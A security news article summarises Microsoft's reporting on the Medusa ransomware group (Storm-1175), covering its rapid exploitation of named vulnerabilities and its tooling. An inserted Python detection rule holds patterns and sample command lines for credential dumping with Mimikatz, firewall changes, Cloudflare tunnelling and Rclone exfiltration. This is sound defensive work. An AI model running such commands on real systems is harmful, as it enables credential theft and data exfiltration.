The Medusa ransomware group has been operating at a fast pace, seizing short windows of opportunity in attacks across multiple verticals, Microsoft says.
Operating as a ransomware-as-a-service (RaaS), Medusa has been active since June 2021 and hit over 300 organizations in the critical infrastructure sector by February 2025.
The group is known for engaging in double extortion, stealing victims’ data in addition to encrypting it, as well as for relying on phishing and the exploitation of unpatched vulnerabilities for initial access.
In recent attacks, Medusa’s operators, tracked by Microsoft as Storm-1175, were seen moving rapidly from initial access to post-compromise operations, often within days or, in some cases, hours.
Additionally, the group was seen quickly weaponizing newly disclosed vulnerabilities, as well as exploiting zero-day bugs in web-facing systems.
“The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, the United Kingdom, and the United States,” Microsoft says.
Over the past three years, Medusa’s operators have exploited at least 16 vulnerabilities in Microsoft Exchange, PaperCut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, SAP NetWeaver, CrushFTP, GoAnywhere MFT, SmarterMail, and BeyondTrust.
Storm-1175, Microsoft says, weaponizes newly disclosed vulnerabilities immediately. It was seen exploiting the NetWeaver bug one day after it was publicly disclosed on April 24, 2025.
The group was also seen chaining multiple security defects to obtain remote code execution (RCE) on the victims’ systems. It has also targeted Linux systems, including Oracle WebLogic instances.
According to Microsoft, the group has exploited at least three zero-day flaws, including CVE-2026-23760 (SmarterMail) and CVE-2025-10035 (GoAnywhere MFT). In some cases, Storm-1175 exploited the flaws seven days before public disclosure.
Following initial access, the gang typically deploys a web shell or remote access payload and proceeds to data exfiltration and the execution of file-encrypting ransomware within one day.
During this window, Storm-1175 establishes persistence, performs reconnaissance and lateral movement, modifies firewall settings to enable remote access, and exfiltrates credentials.
“We have also observed that after gaining administrator credentials, Storm-1175 has used a script to recover passwords from Veeam backup software, which is used to connect to remote hosts, therefore enabling ransomware deployment to additional connected systems,” Microsoft notes.
The hackers have been using built-in and administrative tooling such as PowerShell and PsExec, along with Cloudflare tunnels, Remote Desktop Protocol (RDP), various remote monitoring and management (RMM) tools, PDQ Deployer for payload execution, Impacket and Mimikatz for lateral movement and credential harvesting, and Bandizip and Rclone for data collection and exfiltration.
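The tempo described above (firewall changes, tunnelling, credential theft, lateral movement, archiving and exfiltration compressed into hours) is what makes this tradecraft detectable as a cluster rather than as isolated tool sightings. The following is an added example, not code from Microsoft's report or the original article: a small correlation rule over process-creation events that flags a host when several distinct stages of that sequence appear within one window. The event format, the command-line regexes and the sample rows are constructed for illustration; the tool names come from the article, the exact command-line shapes are assumptions.

```python
"""Added example: correlate Storm-1175-style tradecraft stages per host.

Not Microsoft's or the original article's code. Event layout, regexes and
sample rows are constructed; only the tool names come from the article.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Stage -> command-line patterns. Patterns are deliberately narrow
# (e.g. rclone only with a transfer verb) so routine admin use does not fire.
STAGE_PATTERNS = {
    "tunnel":      [r"\bcloudflared(\.exe)?\b.*\btunnel\b"],
    "remote_exec": [r"\bpsexec(64)?(\.exe)?\b", r"\bwmiexec\b", r"\bsmbexec\b",
                    r"\bPDQDeploy"],
    "cred_dump":   [r"\bmimikatz\b", r"sekurlsa::", r"\bsecretsdump\b"],
    "firewall":    [r"\bnetsh\b.*\badvfirewall\b.*\b(add|set)\b",
                    r"\b(New|Set)-NetFirewallRule\b"],
    "archive":     [r"\bbandizip\b"],
    "exfil":       [r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b"],
}
COMPILED = {stage: [re.compile(p, re.IGNORECASE) for p in pats]
            for stage, pats in STAGE_PATTERNS.items()}


def classify(cmdline: str):
    """Return the tradecraft stage a command line matches, or None."""
    for stage, patterns in COMPILED.items():
        if any(p.search(cmdline) for p in patterns):
            return stage
    return None


def correlate(events, window=timedelta(hours=24), min_stages=3):
    """Report hosts on which at least min_stages distinct stages occur
    inside any interval of length `window` (sliding over sorted events).
    Returns {host: sorted list of stages seen in the densest window}."""
    by_host = defaultdict(list)
    for ev in events:
        stage = classify(ev["cmdline"])
        if stage:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))
    hits = {}
    for host, tagged in by_host.items():
        tagged.sort()
        best = set()
        for i, (t0, _) in enumerate(tagged):
            seen = {s for t, s in tagged[i:] if t - t0 <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_stages:
            hits[host] = sorted(best)
    return hits


# Constructed sample events (ISO timestamps, host, process command line).
SAMPLE_EVENTS = [
    # SRV-FILE01: the reported sequence compressed into a few hours.
    {"ts": "2025-05-01T01:10:00", "host": "SRV-FILE01",
     "cmdline": r'netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389'},
    {"ts": "2025-05-01T01:25:00", "host": "SRV-FILE01",
     "cmdline": r"cloudflared.exe tunnel run --token <redacted>"},
    {"ts": "2025-05-01T02:40:00", "host": "SRV-FILE01",
     "cmdline": r'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"ts": "2025-05-01T03:05:00", "host": "SRV-FILE01",
     "cmdline": r"psexec.exe \\SRV-DB01 -s cmd.exe /c whoami"},
    {"ts": "2025-05-01T04:50:00", "host": "SRV-FILE01",
     "cmdline": r"Bandizip.exe c D:\staging\finance.zip D:\Finance"},
    {"ts": "2025-05-01T05:30:00", "host": "SRV-FILE01",
     "cmdline": r"rclone.exe copy D:\staging remote:bucket --transfers 16"},
    # WS02: a lone admin PsExec use and nothing else; must not fire.
    {"ts": "2025-05-01T09:00:00", "host": "WS02",
     "cmdline": r"psexec.exe \\WS03 -s ipconfig /all"},
    # WS05: rclone without a transfer verb, then a firewall change a day later.
    {"ts": "2025-05-01T10:00:00", "host": "WS05", "cmdline": "rclone.exe version"},
    {"ts": "2025-05-02T12:00:00", "host": "WS05",
     "cmdline": "netsh advfirewall set allprofiles state off"},
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Only SRV-FILE01 crosses the threshold; the single PsExec on WS02 and the two unrelated events on WS05 do not. In a real deployment the events would come from Sysmon Event ID 1 or Windows Security 4688, and the window and threshold should be tuned per environment; the point of the rule is that the group's speed works against it once stages are correlated rather than alerted on individually.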
In light of Microsoft’s report, Tuskira co-founder and CEO Piyush Sharma and AttackIQ field CISO Pete Luban urge at-risk organizations to continuously inventory and monitor both internal and external systems to identify exploitable assets and reduce risks.
“The heightened speed and efficiency of these campaigns is a game-changer for organizations with high-pressure environments like hospitals, insurers, and banks, which is who Storm-1175 is primarily targeting. These organizations already have little tolerance for downtime, complex edge infrastructure, and a constant patching backlog, so a threat actor that can spot exposed assets and exploit them before defenders catch up has a much wider lane than it did even a year ago,” Sharma said.
Luban commented, “If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime, it’s the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data.”
